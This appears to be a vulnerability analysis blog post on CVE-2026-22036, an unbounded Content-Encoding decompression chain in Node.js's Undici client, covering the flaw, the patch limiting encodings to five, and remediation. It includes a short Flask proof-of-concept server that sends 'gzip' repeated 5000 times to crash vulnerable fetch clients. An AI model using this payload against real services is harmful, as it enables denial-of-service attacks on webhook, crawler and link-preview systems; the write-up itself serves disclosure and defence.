CVE-2026-22036

Death by a Thousand Gzips: The Node.js Undici Decompression Loop

Alon Barad
Alon Barad
Software Engineer

Jan 15, 2026·6 min read

Executive Summary (TL;DR)

Undici, the engine behind Node.js's native `fetch()`, failed to limit the number of decompression steps it would perform on a response. By sending a header like `Content-Encoding: gzip, gzip, ...` repeated thousands of times, an attacker can force the client to allocate thousands of stream objects, leading to high CPU usage and eventual process crashes (DoS). The fix introduces a hard limit of 5 encoding layers.

A resource exhaustion vulnerability in the Undici HTTP client allows malicious servers to crash Node.js applications by supplying an excessive number of compression layers in the Content-Encoding header.

The Hook: When Fetch Goes Wrong

We all love fetch(). It’s standard, it’s modern, and in Node.js, it’s powered by a library called Undici. For years, Node developers relied on the clunky http module or third-party giants like axios and request. Undici came along promising speed and spec compliance. And for the most part, it delivered.

But here's the thing about "spec compliance": the HTTP specification is a wild place. It allows for things that no sane engineer would ever actually use, but which must be supported strictly for the sake of correctness. One of those things is the Content-Encoding header.

Usually, you see Content-Encoding: gzip or br (Brotli). Maybe, if you are working with some ancient enterprise legacy nightmare, you might see compress. The spec, however, allows you to stack them. You can compress a file, then compress the result, then compress that result. Undici handles this automatically to be helpful. Unfortunately, it was a little too helpful.

The Flaw: infinite_loops.jpg

The vulnerability lies in how Undici handled that stacking mechanism. Logic dictates that if a server sends a response, it might be encoded. Undici's job is to look at the Content-Encoding header, split it by commas, and set up a reverse bucket brigade to decode the data back into plain text before handing it to your application.

In lib/interceptor/decompress.js, the code did exactly that: it split the header string and iterated over the entries. For every entry, it instantiated a new DecompressorStream (usually wrapping Node's native Zlib or Brotli bindings) and piped the output of one into the input of the next.

The catch? There was no stop sign. No bouncer at the door counting the guests. If a malicious server sent a header with gzip repeated 10,000 times, Undici would obediently attempt to create a pipeline of 10,000 streams.

This isn't a traditional "zip bomb" where a small file expands to fill your hard drive. This is an allocation bomb. Creating thousands of stream objects—each with its own internal buffers, state management, and C++ bindings—is expensive. It eats memory for breakfast and CPU cycles for lunch, freezing the Node.js event loop until the process gasps and dies.

The Code: The Smoking Gun

Let's look at the crime scene. This is the logic inside the DecompressHandler class before the patch. It's clean, readable, and dangerously naive.

// PRE-PATCH (Simplified for dramatic effect)
#createDecompressionChain (encodings) {
  const parts = encodings.split(',')
  const decompressors = []
 
  for (const part of parts) {
    // 1. Read the encoding
    const encoding = part.trim().toLowerCase()
    
    // 2. Create a heavy stream object for it
    const decompressor = new DecompressorStream(encoding)
    
    // 3. Add to the pile
    decompressors.push(decompressor)
  }
  return decompressors
}

See the loop? It runs as many times as there are commas in the header. Now, let's look at the fix implemented in commit b04e3cbb569c1596f86c108e9b52c79d8475dcb3. The developers added a hard sanity check, similar to what curl and browsers have done for years.

// POST-PATCH
#createDecompressionChain (encodings) {
  const parts = encodings.split(',')
  
  // SANITY CHECK START
  const maxContentEncodings = 5
  if (parts.length > maxContentEncodings) {
    throw new Error(`too many content-encodings in response: ${parts.length}, maximum allowed is ${maxContentEncodings}`)
  }
  // SANITY CHECK END
 
  // ... proceed with loop
}

Five. That’s the magic number. If you are wrapping your HTTP response in more than five layers of compression, you aren't optimizing bandwidth; you're just trolling.

The Exploit: Building the Pipeline of Doom

Exploiting this is trivially easy if you can trick a target server into visiting a URL you control (SSRF) or if the target is a crawler/bot.

You don't need to generate a massive payload. You just need to generate a massive header. Here is a conceptual Python script that acts as the malicious server:

from flask import Flask, Response
app = Flask(__name__)
 
@app.route('/')
def malicious():
    # The Payload: 'gzip' repeated 5000 times
    evil_header = ", ".join(["gzip"] * 5000)
    
    # We send a tiny body, it doesn't matter.
    # The client dies trying to build the pipe, not processing the data.
    return Response("Hello, dead process.", headers={"Content-Encoding": evil_header})
 
if __name__ == '__main__':
    app.run(port=80)

When the vulnerable Node.js client hits this endpoint:

  1. It receives the headers.
  2. It sees 5,000 gzip directives.
  3. It enters the loop in createDecompressionChain.
  4. Memory usage spikes as thousands of Zlib contexts are initialized.
  5. The Event Loop blocks completely while C++ bindings are set up.
  6. The application becomes unresponsive or crashes with an Out of Memory (OOM) error.

This is particularly nasty because it happens before the application code receives the response body. You can't catch this with a try/catch block around your logic if the crash happens inside the library's internal stream setup.

The Impact: Why Low CVSS is a Lie

The official CVSS score is 3.7 (Low). This is technically correct based on the formula: it requires the victim to connect to the attacker (Attack Complexity: High). But don't let that fool you.

In the modern web, servers connect to untrusted URLs all the time:

  • Webhooks: "Enter your URL and we'll send you a ping."
  • Link Previews: Discord, Slack, and social media bots fetching metadata.
  • Image Proxies: Services that resize images from remote URLs.
  • Feed Aggregators: RSS readers.

If you run any service that fetches a user-supplied URL using Node.js fetch (or a library wrapping it), you are vulnerable. A single request from a malicious user can take down a worker process. If you don't have robust process restart strategies (like PM2 or Kubernetes probes), your service goes dark.

The Fix: Update and Monitor

The fix is straightforward: the library now limits the encoding chain to 5 layers. If a server tries to get cute, Undici throws an error: too many content-encodings in response.

Remediation Steps:

  1. Check your lockfiles: Look for undici in package-lock.json or yarn.lock.
  2. Update: You need version 6.23.0 or 7.18.0.
  3. Node.js Core: Since Undici is bundled with Node.js, updating your Node.js runtime to the latest security release is the safest bet.

Defense in Depth: If you are writing a crawler, don't just rely on library patches. Implement your own timeouts and resource limits. Never trust an external HTTP server to play nice.

Fix Analysis (1)

Technical Appendix

CVSS Score
3.7/ 10
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L
EPSS Probability
0.04%
Top 100% most exploited

Affected Systems

Node.js Applications using global fetch()Undici (v7.x < 7.18.0)Undici (v6.x < 6.23.0)

Affected Versions Detail

Product
Affected Versions
Fixed Version
Undici
Node.js
>= 7.0.0, < 7.18.07.18.0
Undici
Node.js
< 6.23.06.23.0
AttributeDetail
CWE IDCWE-770
Attack VectorNetwork
CVSS3.7 (Low)
ImpactDenial of Service (DoS)
Componentlib/interceptor/decompress.js
Limit Introduced5 Encodings
CWE-770
Allocation of Resources Without Limits or Throttling

Allocation of Resources Without Limits or Throttling

Vulnerability Timeline

Fix authored by Matteo Collina
2026-01-06
CVE and GHSA Published
2026-01-14

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.